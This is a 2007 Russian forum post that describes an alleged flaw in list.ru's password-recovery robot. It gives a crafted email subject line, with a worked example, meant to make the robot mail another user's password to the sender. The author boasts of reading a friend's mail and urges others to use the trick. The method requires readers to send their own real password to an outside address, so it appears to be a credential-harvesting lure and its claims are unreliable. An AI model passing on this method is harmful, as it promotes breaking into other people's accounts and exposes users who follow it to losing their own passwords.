| DINAMIT | Дата: Суббота, 14.04.2007, 22:47 | Сообщение # 1 |
|
Рядовой
Группа: Пользователи
Сообщений: 1
Статус: Offline
| Я обнаружил эту дыру случайно. Оказывается, на list.ru зарегистрирован аккаунт info.pass@list.ru Но аккаунт этот не простой — он управляется роботом и
занимается тем, что высылает пароли забывчивым пользователям. То есть, после того, как пользователь ввёл в специальную форму всю необходимую информацию для
восстановления пароля (дата рождения и ответ на секретный вопрос), она посылается роботу, который генерирует новый пароль, который в свою очередь и
отображается на сайте. Всё бы хорошо, но роботу можно послать запрос вида
Subject:login=<e-mail человека который ломаем>&pass=&answer=;login=<ваш e-mail>&pass=<ваш пароль который вы знаете:)>&answer=
указанный пароль подходит к логину и робот высылает пароль - но высылает пароль от e-mailа который нас интересует на наш ящик - вот в этом и вся фишка.
Итак, надо взломать e-mail lozer@mail.ru наш e-mail hacker@yandex.ru а пароль ujuf-novy то запрос будет выглядеть следующим образом
Subject:login=lozer@mail.ru&pass=&answer=;login=hacker@yand ex.ru&pass=ujuf-novy&answer=
Всё! Теперь на ваш ящик придёт письмо примерно такого содержания:
[09.11.2005 18:59 GSM+03]
Forgotten bot
Password requested for user lozer@mail.ru
Рыжик
P.S Это действительно работает!!! Так я узнал много нового о своем лучшем друге и подруге:) Единственно это то, что если сервер
будет загружен, то ответ может придти только через пару дней (мне ответ пришел на следующий день вечером)- но лично мне главное
чтобы ответ ПРИШЕЛ:) Пользуйтесь хацкеры пока админы эту дыру не залатали...
|
| |
| |
